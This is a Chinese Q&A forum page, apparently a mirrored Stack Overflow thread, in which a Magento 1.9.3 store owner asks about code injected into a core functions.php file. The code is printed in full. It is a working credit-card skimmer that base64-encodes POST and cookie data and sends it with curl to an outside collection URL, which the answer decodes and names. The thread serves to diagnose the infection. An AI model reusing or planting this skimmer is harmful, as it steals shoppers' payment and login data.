代码之家  ›  专栏  ›  技术社区  ›  Greg

服务器端扫描程序检测到“php.malware.magento cc stealer.069”

malware magento-1.9 magento php
  •  1
  • Greg  · 技术社区  · 7 年前

    我有一个服务器端扫描器,可以扫描我的网站,寻找任何恶意代码的痕迹。我今天早上来看看有没有报告 php。恶意软件。magento cc stealer。069 在我的 app/code/core/Mage/Core/functions.php 文件

    我使用Magento 1.9.3版运行在线商店。

    我浏览了这个文件,并将其与干净的Magento 1.9.3的镜像副本进行了比较 function.php 文件

    我发现要添加到我的文件中: 

    if (preg_match("/".base64_decode('YmlsbGluZ3xmaXJzdG5hbWV8Y2NfbnVtYmVyfGxvZ2lufHVzZXJuYW1lfHBheW1lbnR8Y2Nf')."/i", serialize($_POST)))
    exec("curl --data \"version=1&encode=".base64_encode(   serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".base64_decode('aHR0cHM6Ly9tYWdlc2NyaXB0cy5pbmZvL3Rlc3RTZXJ2ZXIucGhw')." > /dev/null 2<&1 &");

    任何人都能解释这会造成什么后果?

    据我所知,if语句的第一行表示,如果数据与编码文本匹配( 账单|名字|抄送号码|登录|用户名|付款|抄送_ )并且区分大小写,生成一个值的可存储表示并发布它。不过,我正在努力学习第二行。

    1 回复  |  直到 6 年前
        1
  •  2
  •   petrtvaruzek    7 年前

    顾名思义,它正试图窃取信用卡信息。

    只要这些信用卡字段出现在POST请求中,它就会触发,并通过curl将它们连同cookie信息和您的服务器地址一起发送到 https://magescripts.info/testServer.php (不要单击!)这可能是另一个受害者,托管攻击者的收集脚本。注意:如果是magescripts。信息是您的域,您的搜索尚未结束,您应该找到testServer所在的位置。php点并将其删除。

    推荐文章
    GravityCode  ·  WordPress网站已将我的链接重定向到onclickads网站
    7 年前
    Jerry  ·  奇怪的恶意软件div注入浏览器,该怎么办?
    10 年前
    Hardik Bhangale  ·  InetSim可以与Cygwin一起使用吗?
    11 年前
    Wizard  ·  来自我的网站的恶意软件垃圾邮件[已关闭]
    11 年前
    关于   移动版
    代码之家 - 一站式码农服务社区
    沪ICP备11025650号